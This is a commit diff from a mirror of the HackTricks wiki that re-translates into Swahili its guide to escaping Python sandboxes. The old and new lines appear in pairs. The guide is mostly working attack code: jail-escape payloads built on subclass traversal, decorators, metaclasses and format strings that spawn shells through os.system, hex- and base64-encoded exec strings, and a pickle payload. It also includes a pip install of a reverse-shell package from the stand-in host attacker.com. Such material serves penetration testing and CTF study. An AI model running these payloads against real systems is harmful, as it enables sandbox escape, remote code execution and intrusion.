maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/network-services-pentesting/pentesting-web/django.m

Browse Source
This commit is contained in:
Translator 2025-08-28 12:47:30 +00:00
parent 7679635e24
commit 7ac2766567
6 changed files with 429 additions and 422 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

182
src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
View File

@ -1,12 +1,12 @@
# Bypass Python sandboxes
# Kuvuka Python sandboxes
{{#include ../../../banners/hacktricks-training.md}}
Hizi ni baadhi ya mbinu za bypass python sandbox protections na execute arbitrary commands.
Hizi ni mbinu kadhaa za kuvuka ulinzi wa Python sandboxes na kutekeleza amri yoyote.
## Command Execution Libraries
## Maktaba za Utekelezaji wa Amri
Jambo la kwanza unalopaswa kujua ni kama unaweza directly execute code kwa kutumia baadhi ya library ambazo tayari zimeimport, au kama unaweza import yoyote ya library hizi:
Jambo la kwanza unalopaswa kujua ni kama unaweza kutekeleza code moja kwa moja kwa kutumia library ambayo tayari imeimportwa, au kama unaweza kuimport yoyote ya maktaba hizi:
```python
os.system("ls")
os.popen("ls").read()
@ -39,21 +39,21 @@ open('/var/www/html/input', 'w').write('123')
execfile('/usr/lib/python2.7/os.py')
system('ls')
```
Kumbuka kwamba _**open**_ na _**read**_ functions zinaweza kuwa muhimu kwa **kusoma faili** ndani ya python sandbox na kwa **kuandika baadhi ya code** ambayo unaweza **kuitekeleza** ili **bypass** sandbox.
Kumbuka kwamba _**open**_ na _**read**_ functions zinaweza kuwa muhimu ili **read files** ndani ya python sandbox na ili **write some code** ambayo unaweza **execute** ili **bypass** the sandbox.
> [!CAUTION] > **Python2 input()** function inaruhusu kutekeleza code ya python kabla programu ianguke.
> [!CAUTION] > **Python2 input()** function inaruhusu kutekeleza python code kabla programu inavyoanguka.
Python hujaribu **kupakia maktaba kutoka directory ya sasa kwanza** (amri ifuatayo itaonyesha wapi python inapakia modules kutoka): `python3 -c 'import sys; print(sys.path)'`
Python inajaribu **load libraries from the current directory first** (amri ifuatayo itaonyesha mahali python inavyopakia modules kutoka): `python3 -c 'import sys; print(sys.path)'`
![](<../../../images/image (559).png>)
## Bypass pickle sandbox kwa packages za python zilizosakinishwa kwa chaguo-msingi
## Bypass pickle sandbox with the default installed python packages
### Packages za chaguo-msingi
### Default packages
Unaweza kupata **orodha ya packages zilizowekwa tayari** hapa: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Kumbuka kwamba kutoka kwa pickle unaweza kufanya python env **import arbitrary libraries** zilizosakinishwa kwenye mfumo.\
Kwa mfano, pickle ifuatayo, itakapopakiwa, itachukua library ya pip ili kuitumia:
Unaweza kupata **list of pre-installed** packages hapa: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Note kwamba kutoka kwa pickle unaweza kufanya python env **import arbitrary libraries** zilizowekwa kwenye system.\
Kwa mfano, pickle ifuatayo, inapopakuliwa, ita-import pip library ili kuitumia:
```python
#Note that here we are importing the pip library so the pickle is created correctly
#however, the victim doesn't even need to have the library installed to execute it
@ -66,32 +66,32 @@ return (pip.main,(["list"],))
print(base64.b64encode(pickle.dumps(P(), protocol=0)))
```
Kwa maelezo zaidi kuhusu jinsi pickle inavyofanya kazi angalia hii: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
Kwa habari zaidi kuhusu jinsi pickle inavyofanya kazi angalia hii: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
### Pip package
Mbinu iliyoshirikiwa na **@isHaacK**
Ikiwa una ufikiaji wa `pip` au `pip.main()` unaweza kusakinisha kifurushi chochote na kupata reverse shell kwa kuita:
Ikiwa una ufikiaji wa `pip` au `pip.main()` unaweza kusanisha package yoyote na kupata reverse shell kwa kuita:
```bash
pip install http://attacker.com/Rerverse.tar.gz
pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
```
Unaweza kupakua paketi ya kuunda reverse shell hapa. Tafadhali, kumbuka kwamba kabla ya kuitumia unapaswa **kunyoosha (decompress) faili, kubadilisha `setup.py`, na kuweka IP yako kwa reverse shell**:
Unaweza kupakua kifurushi ili kuunda reverse shell hapa. Tafadhali, kumbuka kwamba kabla ya kuitumia unapaswa **kuifungua, kubadilisha `setup.py`, na kuweka IP yako kwa reverse shell**:
{{#file}}
Reverse.tar (1).gz
{{#endfile}}
> [!TIP]
> Paketi hii inaitwa `Reverse`. Hata hivyo, ilitengenezwa maalum ili wakati utaondoka kwenye reverse shell usakinishaji wa mabaki utashindwa, kwa hivyo **hutaacha paketi yoyote ya ziada ya python imewekwa kwenye seva** utakapoondoka.
> Kifurushi hiki kinaitwa `Reverse`. Hata hivyo, kilitengenezwa maalum ili wakati unapoondoka kwenye reverse shell usakinishaji uliobaki utakosewa, hivyo **hutaacha python package nyingine yoyote iliyosakinishwa kwenye server** unapoondoka.
## Eval-ing python code
> [!WARNING]
> Kumbuka kwamba exec inaruhusu multiline strings na ";", lakini eval si hivyo (angalia walrus operator)
> Kumbuka kwamba exec inaruhusu multiline strings na ";", lakini eval haisiruhusu (angalia walrus operator)
Ikiwa certain characters zimetengwa unaweza kutumia uwakilishi wa **hex/octal/B64** ili **bypass** kizuizi:
Ikiwa herufi fulani zimezuiliwa unaweza kutumia uwakilishi wa **hex/octal/B64** ili **bypass** kizuizi:
```python
exec("print('RCE'); __import__('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
@ -112,7 +112,7 @@ exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
### Maktaba nyingine zinazoruhusu eval ya python code
### Maktaba nyingine zinazoruhusu eval python code
```python
#Pandas
import pandas as pd
@ -126,15 +126,15 @@ df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")
# Like:
df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")
```
Pia angalia kutoroka halisi kutoka kwa evaluator aliyowekwa kwenye sandbox katika vianzishaji vya PDF:
Pia angalia sandbox escape ya evaluator katika jenereta za PDF:
- ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). Inatumia vibaya rl_safe_eval kufikia function.__globals__ na os.system kutoka kwa sifa zilizotathminiwa (kwa mfano, rangi ya fonti) na hurudisha thamani halali ili kufanya rendering iwe thabiti.
- ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). Inatumia rl_safe_eval kufikia function.__globals__ na os.system kutoka kwa attributes zilizotathminiwa (kwa mfano, font color) na inarudisha thamani halali ili kuweka rendering thabiti.
{{#ref}}
reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
{{#endref}}
## Operatori na mbinu fupi
## Operators na mbinu fupi
```python
# walrus operator allows generating variable inside a list
## everything will be executed in order
@ -143,9 +143,9 @@ reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
```
## Kuvunja ulinzi kupitia encodings (UTF-7)
## Kupita ulinzi kwa kutumia encodings (UTF-7)
Katika [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 inatumiwa kupakia na kutekeleza msimbo wa python wa aina yoyote ndani ya sandbox inayoonekana:
Katika [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 inatumika kupakia na kutekeleza msimbo wowote wa python ndani ya sandbox inayojionyesha:
```python
assert b"+AAo-".decode("utf_7") == "\n"
@ -156,13 +156,13 @@ return x
#+AAo-print(open("/flag.txt").read())
""".lstrip()
```
Inawezekana pia kuipita kwa kutumia enkodaji nyingine, kwa mfano `raw_unicode_escape` na `unicode_escape`.
Pia inawezekana kupita kizuizi kwa kutumia encodings nyingine, kwa mfano `raw_unicode_escape` na `unicode_escape`.
## Utekelezaji wa Python bila miito
## Utekelezaji wa Python bila calls
Ikiwa uko ndani ya python jail ambayo **hainakuruhusu kufanya miito**, bado kuna njia za **execute arbitrary functions, code** na **commands**.
Ikiwa uko ndani ya python jail ambayo **doesn't allow you to make calls**, bado kuna njia za **execute arbitrary functions, code** na **commands**.
### RCE na [decorators](https://docs.python.org/3/glossary.html#term-decorator)
### RCE with [decorators](https://docs.python.org/3/glossary.html#term-decorator)
```python
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
@exec
@ -184,13 +184,13 @@ X = exec(X)
@'__import__("os").system("sh")'.format
class _:pass
```
### RCE kuunda objects na overloading
### RCE creating objects and overloading
Ikiwa unaweza **kutangaza class** na **kuunda object** ya class hiyo unaweza **kuandika/kufuta na kuandika upya methods tofauti** ambazo zinaweza **kufanyakazi** **bila** **kuhitaji kuziita moja kwa moja**.
Ikiwa unaweza **declare a class** na **create an object** ya class hiyo, unaweza **write/overwrite different methods** ambazo zinaweza ku**triggered** **without** **needing to call them directly**.
#### RCE with custom classes
Unaweza kubadilisha baadhi ya **class methods** (_kwa kuoverwrite class methods zilizopo au kuunda class mpya_) ili kuzifanya ziwe na uwezo wa **execute arbitrary code** wakati zinapokuwa **triggered** bila kuziita moja kwa moja.
Unaweza kubadilisha baadhi ya **class methods** (_by overwriting existing class methods or creating a new class_) ili kuzifanya zi**execute arbitrary code** wakati zitakapokuwa **triggered** bila kuzuita moja kwa moja.
```python
# This class has 3 different ways to trigger RCE without directly calling any function
class RCE:
@ -240,9 +240,9 @@ __iand__ (k = 'import os; os.system("sh")')
__ior__ (k |= 'import os; os.system("sh")')
__ixor__ (k ^= 'import os; os.system("sh")')
```
#### Kuunda vitu kwa [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses)
#### Kuunda objects kwa kutumia [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses)
Jambo kuu ambalo metaclasses zinaturuhusu ni **kuunda instance ya class, bila kuita constructor** moja kwa moja, kwa kuunda class mpya ambapo class lengwa ni metaclass.
Jambo kuu ambalo metaclasses zinaturuhusu ni **kutengeneza instance ya class, bila kuita constructor** moja kwa moja, kwa kuunda class mpya ambayo class lengwa ni metaclass.
```python
# Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed
# This will define the members of the "subclass"
@ -259,7 +259,7 @@ Sub['import os; os.system("sh")']
```
#### Kuunda objects kwa exceptions
Wakati **exception inapotokea**, object ya **Exception** **imetengenezwa** bila wewe kuhitaji kuita constructor moja kwa moja (njia kutoka kwa [**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)):
Wakati **exception inapotokea** object ya **Exception** **inaundwa** bila wewe kuhitaji kuita constructor moja kwa moja (triki kutoka kwa [**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)):
```python
class RCE(Exception):
def __init__(self):
@ -279,7 +279,7 @@ k + 'import os; os.system("sh")' #RCE abusing __add__
## You can also use the tricks from the previous section to get RCE with this object
```
### Zaidi ya RCE
### Zaidi RCE
```python
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
# If sys is imported, you can sys.excepthook and trigger it by triggering an error
@ -301,7 +301,7 @@ __iadd__ = eval
__builtins__.__import__ = X
{}[1337]
```
### Soma faili kwa msaada wa builtins & leseni
### Soma faili kwa builtins help & license
```python
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__.help
@ -315,17 +315,17 @@ pass
- [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
- [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
Ikiwa unaweza kupata object ya **`__builtins__`** unaweza import libraries (kumbuka kwamba unaweza pia kutumia hapa string representation nyingine zilizoonyeshwa katika sehemu ya mwisho):
Ikiwa unaweza kufikia object ya **`__builtins__`** unaweza import libraries (kumbuka kwamba unaweza pia kutumia hapa string representation nyingine iliyoonyeshwa katika sehemu ya mwisho):
```python
__builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")
```
### Hakuna Builtins
Unapokosa `__builtins__` hutaweza ku-import chochote wala hata kusoma au kuandika files kwa kuwa **all the global functions** (kama `open`, `import`, `print`...) **aren't loaded**.\
Hata hivyo, **by default python imports a lot of modules in memory**. Modules hizi zinaweza kuonekana benign, lakini baadhi yao pia **zinaleta functionalities hatari** ndani yao ambazo zinaweza kufikiwa ili kupata hata **arbitrary code execution**.
Unapokosa `__builtins__` hutoweza ku-import chochote wala hata kusoma au kuandika mafaili kwa kuwa **all the global functions** (kama `open`, `import`, `print`...) **aren't loaded**.\
Hata hivyo, **by default python imports a lot of modules in memory**. Modules hizi zinaweza kuonekana **benign**, lakini baadhi yao pia zinaingiza functionalities **dangerous** ndani yao ambazo zinaweza kufikiwa ili kupata hata **arbitrary code execution**.
Katika mifano ifuatayo unaweza kuona jinsi ya **kutumia vibaya** baadhi ya modules hizi "**benign**" zilizo-pakiwa ili **kupata** **dangerous** **functionalities** ndani yao.
Katika mifano ifuatayo unaweza kuona jinsi ya **kutumia vibaya** baadhi ya hizi "**benign**" modules zilizopakiwa ili **kupata** functionalities **dangerous** ndani yao.
**Python2**
```python
@ -367,7 +367,7 @@ get_flag.__globals__['__builtins__']
# Get builtins from loaded classes
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
```
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) ili kupata makumi/**mamia** ya **maeneo** ambapo unaweza kupata **builtins**.
[**Hapo chini kuna function kubwa zaidi**](#recursive-search-of-builtins-globals) ili kupata kumi/**mamia** ya **maeneo** ambako unaweza kupata **builtins**.
#### Python2 and Python3
```python
@ -409,15 +409,15 @@ class_obj.__init__.__globals__
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
```
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) ili kupata miongo/**mamia** ya **mahali** ambapo unaweza kupata **globals**.
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) kutafuta kumi/**mia** ya **maeneo** ambapo unaweza kupata **globals**.
## Gundua Arbitrary Execution
## Discover Arbitrary Execution
Hapa nataka kuelezea jinsi ya kugundua kwa urahisi **more dangerous functionalities loaded** na kupendekeza exploits zinazotegemewa zaidi.
Hapa nataka kuelezea jinsi ya kugundua kwa urahisi **kazi hatari zaidi zilizopakiwa** na kupendekeza exploits zenye kuaminika zaidi.
#### Accessing subclasses with bypasses
Moja ya sehemu nyeti zaidi za tekniki hii ni uwezo wa **access the base subclasses**. Katika mifano ya awali hii ilifanywa kwa kutumia `''.__class__.__base__.__subclasses__()` lakini kuna **other possible ways**:
Moja ya sehemu nyeti zaidi za mbinu hii ni uwezo wa **access the base subclasses**. Katika mifano ya awali, hili lilifanywa kwa kutumia `''.__class__.__base__.__subclasses__()` lakini kuna **njia nyingine zinazowezekana**:
```python
#You can access the base from mostly anywhere (in regular conditions)
"".__class__.__base__.__subclasses__()
@ -445,18 +445,18 @@ defined_func.__class__.__base__.__subclasses__()
(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
```
### Kutafuta maktaba hatari zilizopakiwa
### Kupata maktaba hatari zilizopakiwa
Kwa mfano, ukijua kwamba kwa maktaba **`sys`** inawezekana **kuingiza maktaba yoyote**, unaweza kutafuta **moduli zilizopakiwa ambazo zimeingiza sys ndani yao**:
Kwa mfano, ukijua kwamba kwa maktaba **`sys`** inawezekana **import arbitrary libraries**, unaweza kutafuta modules zote zilizopakiwa ambazo zimeimport **`sys`** ndani yao:
```python
[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
```
Zipo nyingi, na **tunahitaji moja tu** kutekeleza amri:
Kuna nyingi, na **tunahitaji moja tu** kutekeleza amri:
```python
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
```
Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunazojua zinaweza kutumika **kutekeleza amri**:
Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunajua zinaweza kutumika **kutekeleza amri**:
```python
#os
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
@ -491,7 +491,7 @@ Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunazojua zinaweza
#pdb
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")
```
Zaidi ya hayo, tunaweza hata kutafuta ni moduli zipi zinapakia maktaba hatarishi:
Zaidi ya hayo, tunaweza hata kutafuta ni moduli gani zinapakia maktaba zenye madhara:
```python
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
for b in bad_libraries_names:
@ -510,7 +510,7 @@ builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalE
pdb:
"""
```
Aidha, ikiwa unadhani **maktaba nyingine** zinaweza **kuaita functions ili kutekeleza amri**, tunaweza pia **kuwachuja kwa majina ya functions** ndani ya maktaba zinazowezekana:
Zaidi ya hayo, ikiwa unaamini **other libraries** zinaweza **invoke functions to execute commands**, tunaweza pia **filter by functions names** ndani ya libraries zinazowezekana:
```python
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
@ -546,7 +546,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil
## Utafutaji wa Rekursivu wa Builtins, Globals...
> [!WARNING]
> Hii ni **ajabu kabisa**. Ikiwa unatafuta **kitu kama globals, builtins, open au chochote** tumia tu script hii ili **kwa rekursivu upate maeneo ambapo unaweza kupata kitu hicho.**
> Hii ni **ajabu kabisa**. Ikiwa unatafuta **object kama globals, builtins, open au chochote**, tumia tu script hii kutafuta kwa **rekursivu maeneo ambapo unaweza kupata object hiyo.**
```python
import os, sys # Import these to find more gadgets
@ -671,7 +671,7 @@ https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-
## Python Format String
Ikiwa utatuma **string** kwa python ambayo itafanyiwa **format**, unaweza kutumia `{}` kufikia **taarifa za ndani za python.** Unaweza kutumia mifano iliyotangulia kufikia globals au builtins kwa mfano.
Ikiwa **utatuma** **string** kwa python ambayo **itakayofomatiwa**, unaweza kutumia `{}` kufikia **taarifa za ndani za python.** Unaweza kutumia mifano zilizotangulia kufikia globals au builtins, kwa mfano.
```python
# Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/
CONFIG = {
@ -691,11 +691,11 @@ people = PeopleInfo('GEEKS', 'FORGEEKS')
st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)
```
Angalia jinsi unaweza **kupata sifa** kwa njia ya kawaida kwa kutumia **dot** kama `people_obj.__init__` na **kipengee cha dict** kwa **mabano ya mraba** bila nukuu `__globals__[CONFIG]`
Angalia jinsi unavyoweza **kupata attributes** kwa njia ya kawaida kwa kutumia **dot** kama `people_obj.__init__` na **dict element** kwa **parenthesis** bila nukuu `__globals__[CONFIG]`
Pia kumbuka kwamba unaweza kutumia `.__dict__` kuorodhesha vipengee vya kitu `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
Pia angalia kwamba unaweza kutumia `.__dict__` kuorodhesha elements za object `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
Baadhi ya tabia nyingine za kuvutia za format strings ni uwezekano wa **kutekeleza** **kazi** **`str`**, **`repr`** na **`ascii`** kwenye kitu kilichotajwa kwa kuongeza **`!s`**, **`!r`**, **`!a`** mtawalia:
Baadhi ya sifa nyingine za kuvutia za format strings ni uwezekano wa **kuendesha** **functions** **`str`**, **`repr`** na **`ascii`** kwenye object iliyotajwa kwa kuongeza **`!s`**, **`!r`**, **`!a`** kwa mtiririko:
```python
st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)
@ -711,10 +711,10 @@ return 'HAL 9000'
'{:open-the-pod-bay-doors}'.format(HAL9000())
#I'm afraid I can't do that.
```
**Mifano zaidi** kuhusu **format** **string** yanaweza kupatikana kwenye [**https://pyformat.info/**](https://pyformat.info)
**Mifano zaidi** kuhusu **format** **string** zinaweza kupatikana kwenye [**https://pyformat.info/**](https://pyformat.info)
> [!CAUTION]
> Angalia pia ukurasa ufuatao kwa gadgets zitakazoweza r**ead sensitive information from Python internal objects**:
> Angalia pia ukurasa ufuatao kwa gadgets ambazo zita**soma taarifa nyeti kutoka kwenye vitu vya ndani vya Python**:
{{#ref}}
@ -741,18 +741,18 @@ str(x) # Out: clueless
Kutoka [here](https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-rce): `().class.base.subclasses()[108].load_module('os').system('dir')`
### From format to RCE loading libraries
### Kutoka format hadi RCE — kupakia libraries
Kulingana na [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) inawezekana kupakia arbitrary libraries kutoka disk kwa kutumia format string vulnerability katika python.
Kulingana na [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) inawezekana kupakia maktaba yoyote kutoka kwenye disk kwa kutumia udhaifu wa format string katika python.
Kama ukumbusho, kila wakati kitendo kinapotendeka katika python function fulani hufanywa. Kwa mfano `2*3` itatekeleza **`(2).mul(3)`** au **`{'a':'b'}['a']`** itakuwa **`{'a':'b'}.__getitem__('a')`**.
Kama ukumbusho, kila wakati kitendo kinapotendeka katika python, kazi fulani itaendeshwa. Kwa mfano `2*3` itaendesha **`(2).mul(3)`** au **`{'a':'b'}['a']`** itakuwa **`{'a':'b'}.__getitem__('a')`**.
Una zaidi kama hizi katika section [**Python execution without calls**](#python-execution-without-calls).
Una vingine kama hizi katika sehemu [**Python execution without calls**](#python-execution-without-calls).
A python format string vuln haiwezi kuruhusu kutekeleza function (haiwezi kutumia parenthesis), hivyo haiwezekani kupata RCE kama `'{0.system("/bin/sh")}'.format(os)`.\
Hata hivyo, inawezekana kutumia `[]`. Kwa hivyo, ikiwa common python library ina **`__getitem__`** au **`__getattr__`** method inayotekeleza arbitrary code, inawezekana kuvitumia kupata RCE.
Udhaifu wa format string wa python haukuruhusu kuendesha function (haukuruhusu kutumia parenthesis), hivyo haiwezekani kupata RCE kama `'{0.system("/bin/sh")}'.format(os)`.
Hata hivyo, inawezekana kutumia `[]`. Kwa hiyo, ikiwa maktaba ya kawaida ya python ina method **`__getitem__`** au **`__getattr__`** ambayo inatekeleza arbitrary code, inawezekana kuvitumia vibaya ili kupata RCE.
Akitafuta gadget kama hiyo katika python, writeup alipendekeza hii [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Ambapo alipata hii [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463):
Akitafuta gadget kama hiyo katika python, writeup alipendekeza [**Github search query**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28__getitem__%7C__getattr__%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F&type=code). Ndipo alipokutana na [one](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/__init__.py#L463):
```python
class LibraryLoader(object):
def __init__(self, dlltype):
@ -774,18 +774,18 @@ return getattr(self, name)
cdll = LibraryLoader(CDLL)
pydll = LibraryLoader(PyDLL)
```
Gadget hii inaruhusu **load a library from disk**. Kwa hivyo, inahitajika kwa namna fulani **write or upload the library to load** ikiwa imecompiled ipasavyo kwenye server iliyoshambuliwa.
Gadget hii inaruhusu **load a library from disk**. Kwa hivyo, ni lazima kwa namna fulani **write or upload the library to load** ambayo imecompiled ipasavyo kwa ajili ya seva iliyoshambuliwa.
```python
'{i.find.__globals__[so].mapperlib.sys.modules[ctypes].cdll[/path/to/file]}'
```
Changamoto hii kwa kweli inatumia udhaifu mwingine kwenye server unaoruhusu kuunda faili yoyote kwenye diski ya server.
## Kuchanganua Python Objects
## Kuchambua Python Objects
> [!TIP]
